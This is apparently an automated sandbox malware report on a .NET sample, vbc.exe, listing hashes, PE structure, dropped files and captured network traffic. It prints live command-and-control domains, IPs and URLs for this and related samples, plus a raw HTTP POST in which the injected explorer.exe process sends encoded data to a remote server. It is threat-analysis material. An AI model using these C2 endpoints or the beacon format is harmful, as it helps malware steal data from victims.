                                                • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, e12564.dspb.akamaiedge.net, rp-consumer-prod-displaycatalog-geomap.trafficmanager.net, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                16:09:32API Interceptor2x Sleep call for process: vbc.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                192.185.131.238tmpZL2qxr.exeGet hashmaliciousBrowse
                                                • www.citromudas3a.com/n7ak/?Y0D=eadqkzDW6d7G9CHNpP8tvplfDwB2bGIRpKnKQFxS7ITR/IrBuGnH7IpbEL26PzKuSgzW&6lche=5jgDBfSh1z
                                                Order.exeGet hashmaliciousBrowse
                                                • www.opoetafetado.com/ne5f/?j48xqnK=4vuTYdsPf9aq5hr6dURKOYwo+Vdau7OE0uckw49oBSMoO6RyQ5NZb1GOVQY4+cfGA51u&bN=_N6T46EH3vAlQ
                                                07.F-FS-catalogue.exeGet hashmaliciousBrowse
                                                • www.cunhamaquinas.com/0mq4/?xDK00P=B6RLvpVskqn7ubBP9Wnzlci7jmR0xrItMDlMLkSJFUrcuMgxj95pnWOlsdtB3oz0wxHW&rVSL=-ZbDpfy8BFTPEf20
                                                SWIFT_Copy.exeGet hashmaliciousBrowse
                                                • www.cunhamaquinas.com/0mq4/?8p=B6RLvpVskqn7ubBP9Wnzlci7jmR0xrItMDlMLkSJFUrcuMgxj95pnWOlsdtB3oz0wxHW&2dy=6luT
                                                Dekont.exeGet hashmaliciousBrowse
                                                • www.refdigital2022.com/kt03/?CZoHKt_=cSr8PmJKjhJDOZXh+oaGw+3xXCbOeXgdRyKB+jINoQHWvIB5JN/KWZxbUP+QORSqv2Q3&u8kt=Yd-Dk4lX0HC8AvA
                                                QUOTATION-0214.xlsxGet hashmaliciousBrowse
                                                • www.onlineritual.com/by73/?4hkxzrk=2GomPOWPVV1X4qbEEPnSa8WFsMoMDZPQLIs9T63dSAO8M1AIXR+6xF8T8voz64+ur2j+Ng==&Lzr=vdAlO81HWHJDfD
                                                XUHrxtGebV.exeGet hashmaliciousBrowse
                                                • www.carlajansenimovelcerto.com/h0id/?j8=X7VLPqJGORN6F3FXFGizQb/ROuiZF6vW547FmBqz0zzP4GXIfY8ssqpL+tZi9HUK8PN+&_r9l4=5joHs6H
                                                RFQ_PI02102110.exeGet hashmaliciousBrowse
                                                • www.dicasdomentor.com/rgv6/?p8eT=s0Qy/tk3e9YbhBDMFSJ9VEIWflRXn6spPGItGLdcWOBRDTVhQP7IyJarQn7AmpEZcXV1&C0=p4sD
                                                TQ1YBC14yY.exeGet hashmaliciousBrowse
                                                • www.procurovariedades.com/mxnu/?2dhtUTt0=e63Yw594D6Rcn2UXNsSN67oqb96/kwQ/AvPArXwBVsy/gHtcH69SF11zK+zJbKjoF0o0LgWIcQ==&JFQHSx=I0Gx2xKhHlbdx6M
                                                108.167.169.56Universalmiddel169.exeGet hashmaliciousBrowse
                                                • www.reprograme-se10x.com/gvrw/?gHoDp=0kqKYOzwfkR2OqdzA/HQoe9NiN6D47lhwSUlCjGS1w2d+YeMqJvQVPIcpTEifdoEUOP9LCFGXm/KTpSANQeS0rkq5RBB3fsyWw==&iZ=n0GDY

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                VECTANTARTERIANetworksCorporationJPbotx.armGet hashmaliciousBrowse
                                                • 210.131.197.136
                                                aQD0x2nxAW.armGet hashmaliciousBrowse
                                                • 122.223.23.166
                                                5hYoi7LHAYGet hashmaliciousBrowse
                                                • 157.250.108.28
                                                bxssZASPOJGet hashmaliciousBrowse
                                                • 36.2.53.24
                                                gd9jSnRYLmGet hashmaliciousBrowse
                                                • 133.175.94.176
                                                yIOUZBC1bHGet hashmaliciousBrowse
                                                • 220.158.63.52
                                                notabotnet.x86Get hashmaliciousBrowse
                                                • 133.149.245.115
                                                RYnLNlp3ysGet hashmaliciousBrowse
                                                • 122.222.232.23
                                                CJyYKe5BWdGet hashmaliciousBrowse
                                                • 157.14.224.94
                                                g9xxj6EJKPGet hashmaliciousBrowse
                                                • 220.158.127.222
                                                arm7-20220727-1310Get hashmaliciousBrowse
                                                • 122.223.193.135
                                                home.x86_64-20220726-0916Get hashmaliciousBrowse
                                                • 36.3.20.175
                                                SecuriteInfo.com.Linux.Siggen.9999.181.27546Get hashmaliciousBrowse
                                                • 115.179.235.172
                                                home.arm7-20220725-1455Get hashmaliciousBrowse
                                                • 36.3.20.148
                                                m20yuQyGTUGet hashmaliciousBrowse
                                                • 36.3.233.191
                                                onryo.arm7Get hashmaliciousBrowse
                                                • 202.215.110.221
                                                cK4zmWdmhMGet hashmaliciousBrowse
                                                • 157.250.117.201
                                                JnqM1TFtYi.dllGet hashmaliciousBrowse
                                                • 1.21.110.100
                                                Kq8sxCCgnb.dllGet hashmaliciousBrowse
                                                • 165.100.131.189
                                                Liw5SS6our.dllGet hashmaliciousBrowse
                                                • 220.158.2.173

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vbc.exe.log

                                                Download File
                                                Process:C:\Users\user\Desktop\vbc.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1308
                                                Entropy (8bit):5.345811588615766
                                                Encrypted:false
                                                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
                                                MD5:2E016B886BDB8389D2DD0867BE55F87B
                                                SHA1:25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
                                                SHA-256:1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
                                                SHA-512:C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
                                                Malicious:true
                                                Reputation:high, very likely benign file
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                C:\Users\user\AppData\Local\Temp\4-9E1JJI

                                                Download File
                                                Process:C:\Windows\SysWOW64\control.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                Category:dropped
                                                Size (bytes):40960
                                                Entropy (8bit):0.792852251086831
                                                Encrypted:false
                                                SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):7.770445517790858
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                • DOS Executable Generic (2002/1) 0.01%
                                                File name:vbc.exe
                                                File size:794112
                                                MD5:ba5fa6ee78fe62b57ce7947f6bdb86ff
                                                SHA1:f8409167b9b3e09f390c28cbcebfbec670af16de
                                                SHA256:c2073d015c278a0816ca4ae0a19892874782517dd5133a112ca1f57d44f754fb
                                                SHA512:30649250ca8c07fbfd53c7d343beacec91cad8535e773e3d8b97aef3a678a981fbb6ab5646318d890303fb643938c78152cbe8774230591b4660102677545d35
                                                SSDEEP:12288:rFxgV2iNq+1MMUOS1BuMU0WthpYCXB4eAwRXIbUDbLDuXk:rFxgV10PqMeQe9IbUDHDl
                                                TLSH:C4F4BE1BAF147308C9A76AB5EE4BB9A267F71C1D3135D0783E557C4A4AFF301E52202A
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P..b..............0..............4... ...@....@.. ....................................@................................

                                                File Icon

                                                Icon Hash:00828e8e8686b000

                                                Static PE Info

                                                General

                                                Entrypoint:0x4c34ce
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x62F0E250 [Mon Aug 8 10:15:44 2022 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                Entrypoint Preview

                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xc347c0x4f.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x388.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xc60000xc.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x20000xc14d40xc1600False0.810875131302521data7.777091407724558IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rsrc0xc40000x3880x400False0.369140625data2.842876085485628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0xc60000xc0x200False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountry
                                                RT_VERSION0xc40580x32cdata

                                                Imports

                                                DLLImport
                                                mscoree.dll_CorExeMain

                                                Network Behavior

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Aug 8, 2022 16:11:09.173535109 CEST4979680192.168.2.6103.141.97.24
                                                Aug 8, 2022 16:11:09.451756954 CEST8049796103.141.97.24192.168.2.6
                                                Aug 8, 2022 16:11:09.451920033 CEST4979680192.168.2.6103.141.97.24
                                                Aug 8, 2022 16:11:09.452039003 CEST4979680192.168.2.6103.141.97.24
                                                Aug 8, 2022 16:11:09.730171919 CEST8049796103.141.97.24192.168.2.6
                                                Aug 8, 2022 16:11:09.803188086 CEST8049796103.141.97.24192.168.2.6
                                                Aug 8, 2022 16:11:09.803208113 CEST8049796103.141.97.24192.168.2.6
                                                Aug 8, 2022 16:11:09.803415060 CEST4979680192.168.2.6103.141.97.24
                                                Aug 8, 2022 16:11:09.931919098 CEST4979680192.168.2.6103.141.97.24
                                                Aug 8, 2022 16:11:10.210040092 CEST8049796103.141.97.24192.168.2.6
                                                Aug 8, 2022 16:11:19.985485077 CEST4979880192.168.2.6108.167.169.56
                                                Aug 8, 2022 16:11:20.130086899 CEST8049798108.167.169.56192.168.2.6
                                                Aug 8, 2022 16:11:20.130928040 CEST4979880192.168.2.6108.167.169.56
                                                Aug 8, 2022 16:11:20.131123066 CEST4979880192.168.2.6108.167.169.56
                                                Aug 8, 2022 16:11:20.275513887 CEST8049798108.167.169.56192.168.2.6
                                                Aug 8, 2022 16:11:20.450714111 CEST8049798108.167.169.56192.168.2.6
                                                Aug 8, 2022 16:11:20.450750113 CEST8049798108.167.169.56192.168.2.6
                                                Aug 8, 2022 16:11:20.450776100 CEST8049798108.167.169.56192.168.2.6
                                                Aug 8, 2022 16:11:20.450803995 CEST8049798108.167.169.56192.168.2.6
                                                Aug 8, 2022 16:11:20.450856924 CEST8049798108.167.169.56192.168.2.6
                                                Aug 8, 2022 16:11:20.450884104 CEST8049798108.167.169.56192.168.2.6
                                                Aug 8, 2022 16:11:20.450889111 CEST4979880192.168.2.6108.167.169.56
                                                Aug 8, 2022 16:11:20.450927019 CEST8049798108.167.169.56192.168.2.6
                                                Aug 8, 2022 16:11:20.450953960 CEST8049798108.167.169.56192.168.2.6
                                                Aug 8, 2022 16:11:20.450953960 CEST4979880192.168.2.6108.167.169.56
                                                Aug 8, 2022 16:11:20.450980902 CEST8049798108.167.169.56192.168.2.6
                                                Aug 8, 2022 16:11:20.451008081 CEST8049798108.167.169.56192.168.2.6
                                                Aug 8, 2022 16:11:20.451015949 CEST4979880192.168.2.6108.167.169.56
                                                Aug 8, 2022 16:11:20.451046944 CEST4979880192.168.2.6108.167.169.56
                                                Aug 8, 2022 16:11:20.595535994 CEST8049798108.167.169.56192.168.2.6
                                                Aug 8, 2022 16:11:20.595577955 CEST8049798108.167.169.56192.168.2.6
                                                Aug 8, 2022 16:11:20.595730066 CEST4979880192.168.2.6108.167.169.56
                                                Aug 8, 2022 16:11:21.145468950 CEST4979880192.168.2.6108.167.169.56
                                                Aug 8, 2022 16:11:22.158934116 CEST4979980192.168.2.6108.167.169.56
                                                Aug 8, 2022 16:11:22.296170950 CEST8049799108.167.169.56192.168.2.6
                                                Aug 8, 2022 16:11:22.296277046 CEST4979980192.168.2.6108.167.169.56
                                                Aug 8, 2022 16:11:22.296473980 CEST4979980192.168.2.6108.167.169.56
                                                Aug 8, 2022 16:11:22.433641911 CEST8049799108.167.169.56192.168.2.6
                                                Aug 8, 2022 16:11:22.554661036 CEST8049799108.167.169.56192.168.2.6
                                                Aug 8, 2022 16:11:22.555401087 CEST8049799108.167.169.56192.168.2.6
                                                Aug 8, 2022 16:11:22.555531025 CEST4979980192.168.2.6108.167.169.56
                                                Aug 8, 2022 16:11:22.558259010 CEST4979980192.168.2.6108.167.169.56
                                                Aug 8, 2022 16:11:22.696208954 CEST8049799108.167.169.56192.168.2.6
                                                Aug 8, 2022 16:11:27.620436907 CEST4980080192.168.2.6192.185.131.238
                                                Aug 8, 2022 16:11:27.755534887 CEST8049800192.185.131.238192.168.2.6
                                                Aug 8, 2022 16:11:27.755954981 CEST4980080192.168.2.6192.185.131.238
                                                Aug 8, 2022 16:11:27.756026030 CEST4980080192.168.2.6192.185.131.238
                                                Aug 8, 2022 16:11:27.891019106 CEST8049800192.185.131.238192.168.2.6
                                                Aug 8, 2022 16:11:27.891092062 CEST8049800192.185.131.238192.168.2.6
                                                Aug 8, 2022 16:11:27.891113043 CEST8049800192.185.131.238192.168.2.6
                                                Aug 8, 2022 16:11:27.891132116 CEST8049800192.185.131.238192.168.2.6
                                                Aug 8, 2022 16:11:27.891212940 CEST4980080192.168.2.6192.185.131.238
                                                Aug 8, 2022 16:11:27.891721010 CEST4980080192.168.2.6192.185.131.238
                                                Aug 8, 2022 16:11:28.768277884 CEST4980080192.168.2.6192.185.131.238
                                                Aug 8, 2022 16:11:29.784462929 CEST4980280192.168.2.6192.185.131.238
                                                Aug 8, 2022 16:11:29.928798914 CEST8049802192.185.131.238192.168.2.6
                                                Aug 8, 2022 16:11:29.929754019 CEST4980280192.168.2.6192.185.131.238
                                                Aug 8, 2022 16:11:29.950834990 CEST4980280192.168.2.6192.185.131.238
                                                Aug 8, 2022 16:11:30.095041037 CEST8049802192.185.131.238192.168.2.6
                                                Aug 8, 2022 16:11:30.095088959 CEST8049802192.185.131.238192.168.2.6
                                                Aug 8, 2022 16:11:30.095129013 CEST8049802192.185.131.238192.168.2.6
                                                Aug 8, 2022 16:11:30.095169067 CEST8049802192.185.131.238192.168.2.6
                                                Aug 8, 2022 16:11:30.095267057 CEST4980280192.168.2.6192.185.131.238
                                                Aug 8, 2022 16:11:30.095343113 CEST4980280192.168.2.6192.185.131.238
                                                Aug 8, 2022 16:11:30.110415936 CEST4980280192.168.2.6192.185.131.238
                                                Aug 8, 2022 16:11:30.254679918 CEST8049802192.185.131.238192.168.2.6

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Aug 8, 2022 16:11:09.126292944 CEST6060953192.168.2.68.8.8.8
                                                Aug 8, 2022 16:11:09.145854950 CEST53606098.8.8.8192.168.2.6
                                                Aug 8, 2022 16:11:19.962970972 CEST6264353192.168.2.68.8.8.8
                                                Aug 8, 2022 16:11:19.980540037 CEST53626438.8.8.8192.168.2.6
                                                Aug 8, 2022 16:11:27.599814892 CEST5401553192.168.2.68.8.8.8
                                                Aug 8, 2022 16:11:27.619285107 CEST53540158.8.8.8192.168.2.6
                                                Aug 8, 2022 16:11:35.113869905 CEST5008153192.168.2.68.8.8.8
                                                Aug 8, 2022 16:11:35.238023996 CEST53500818.8.8.8192.168.2.6

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                Aug 8, 2022 16:11:09.126292944 CEST192.168.2.68.8.8.80x35Standard query (0)www.funwave.infoA (IP address)IN (0x0001)
                                                Aug 8, 2022 16:11:19.962970972 CEST192.168.2.68.8.8.80xf0f3Standard query (0)www.reprograme-se10x.comA (IP address)IN (0x0001)
                                                Aug 8, 2022 16:11:27.599814892 CEST192.168.2.68.8.8.80x9609Standard query (0)www.tadeumilhosrp.comA (IP address)IN (0x0001)
                                                Aug 8, 2022 16:11:35.113869905 CEST192.168.2.68.8.8.80x5e59Standard query (0)www.claudianavarro.onlineA (IP address)IN (0x0001)

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                Aug 8, 2022 16:11:09.145854950 CEST8.8.8.8192.168.2.60x35No error (0)www.funwave.info103.141.97.24A (IP address)IN (0x0001)
                                                Aug 8, 2022 16:11:19.980540037 CEST8.8.8.8192.168.2.60xf0f3No error (0)www.reprograme-se10x.comreprograme-se10x.comCNAME (Canonical name)IN (0x0001)
                                                Aug 8, 2022 16:11:19.980540037 CEST8.8.8.8192.168.2.60xf0f3No error (0)reprograme-se10x.com108.167.169.56A (IP address)IN (0x0001)
                                                Aug 8, 2022 16:11:27.619285107 CEST8.8.8.8192.168.2.60x9609No error (0)www.tadeumilhosrp.comtadeumilhosrp.comCNAME (Canonical name)IN (0x0001)
                                                Aug 8, 2022 16:11:27.619285107 CEST8.8.8.8192.168.2.60x9609No error (0)tadeumilhosrp.com192.185.131.238A (IP address)IN (0x0001)
                                                Aug 8, 2022 16:11:35.238023996 CEST8.8.8.8192.168.2.60x5e59No error (0)www.claudianavarro.onlineclaudianavarro.onlineCNAME (Canonical name)IN (0x0001)
                                                Aug 8, 2022 16:11:35.238023996 CEST8.8.8.8192.168.2.60x5e59No error (0)claudianavarro.online92.249.45.183A (IP address)IN (0x0001)

                                                HTTP Request Dependency Graph

                                                • www.funwave.info
                                                • www.reprograme-se10x.com
                                                • www.tadeumilhosrp.com

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.2.649796103.141.97.2480C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Aug 8, 2022 16:11:09.452039003 CEST11238OUTGET /etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=Cta36k8ikZqurnipoxkRmmGd40Kya2aSborXxyuf+Fe+qece1yHxQlddjwwspvxEwVKtNXVfvaYDvAKdsC9znF0tof1OuukDyDlLohNqUsvE HTTP/1.1
                                                Host: www.funwave.info
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Aug 8, 2022 16:11:09.803188086 CEST11239INHTTP/1.1 301 Moved Permanently
                                                Server: nginx
                                                Date: Mon, 08 Aug 2022 14:11:09 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Content-Length: 0
                                                Connection: close
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                X-Redirect-By: WordPress
                                                Location: http://funwave.info/etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=Cta36k8ikZqurnipoxkRmmGd40Kya2aSborXxyuf+Fe+qece1yHxQlddjwwspvxEwVKtNXVfvaYDvAKdsC9znF0tof1OuukDyDlLohNqUsvE


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                1192.168.2.649798108.167.169.5680C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Aug 8, 2022 16:11:20.131123066 CEST11247OUTPOST /etn4/ HTTP/1.1
                                                Host: www.reprograme-se10x.com
                                                Connection: close
                                                Content-Length: 418
                                                Cache-Control: no-cache
                                                Origin: http://www.reprograme-se10x.com
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Content-Type: application/x-www-form-urlencoded
                                                Accept: */*
                                                Referer: http://www.reprograme-se10x.com/etn4/
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Data Raw: 63 52 76 74 35 78 54 68 3d 72 71 4e 69 46 4a 6b 64 61 44 65 48 31 48 6e 36 5a 44 61 75 49 38 72 58 79 4f 7e 46 63 6e 67 49 68 47 68 55 57 54 73 39 6a 38 74 57 4a 52 6d 45 45 5a 57 79 49 70 74 79 73 50 51 71 59 38 41 63 53 75 51 33 44 5f 78 5f 54 73 78 39 49 34 57 6e 62 58 67 45 71 57 77 67 4a 35 74 6c 65 55 6e 39 78 71 75 30 58 67 30 35 58 48 61 6a 4e 4f 63 49 6e 4e 64 58 59 6e 79 35 39 36 6a 41 66 30 55 33 77 4a 54 73 59 4d 35 4f 76 67 48 6a 52 68 32 48 49 68 73 30 78 32 50 56 71 38 62 50 31 57 76 66 52 47 36 41 4a 39 44 5f 38 57 6d 75 53 75 5a 49 75 5f 7a 63 36 78 38 79 74 69 46 79 56 6b 28 5a 63 34 39 78 6d 50 54 4a 6e 6b 6d 52 70 4f 35 68 78 5f 56 64 67 77 4b 78 6c 5a 32 71 6a 70 57 76 63 4e 4c 61 37 48 50 51 4c 6b 36 30 45 30 6c 36 47 62 55 43 41 2d 59 6a 72 31 44 47 76 39 58 32 49 66 67 6f 43 66 44 70 57 51 44 45 4c 77 37 42 6a 72 59 68 30 46 6b 67 46 57 53 4c 32 38 73 73 70 34 4f 37 5a 52 48 36 31 47 39 63 71 7a 61 76 30 4f 6a 44 31 48 35 65 46 57 52 41 33 38 46 61 53 6f 73 79 6e 5f 6d 51 74 61 54 2d 64 6e 59 7a 63 65 69 53 70 7a 65 42 73 35 4b 48 57 52 59 37 49 32 6f 76 49 47 58 47 62 70 39 31 34 73 5a 43 7e 46 38 34 51 47 62 66 44 42 52 39 7e 62 68 4a 44 4c 47 59 56 49 39 59 6f 50 56 43 56 72 72 52 52 75 52 41 64 55 6f 2e 00 00 00 00 00 00 00 00
                                                Data Ascii: cRvt5xTh=rqNiFJkdaDeH1Hn6ZDauI8rXyO~FcngIhGhUWTs9j8tWJRmEEZWyIptysPQqY8AcSuQ3D_x_Tsx9I4WnbXgEqWwgJ5tleUn9xqu0Xg05XHajNOcInNdXYny596jAf0U3wJTsYM5OvgHjRh2HIhs0x2PVq8bP1WvfRG6AJ9D_8WmuSuZIu_zc6x8ytiFyVk(Zc49xmPTJnkmRpO5hx_VdgwKxlZ2qjpWvcNLa7HPQLk60E0l6GbUCA-Yjr1DGv9X2IfgoCfDpWQDELw7BjrYh0FkgFWSL28ssp4O7ZRH61G9cqzav0OjD1H5eFWRA38FaSosyn_mQtaT-dnYzceiSpzeBs5KHWRY7I2ovIGXGbp914sZC~F84QGbfDBR9~bhJDLGYVI9YoPVCVrrRRuRAdUo.
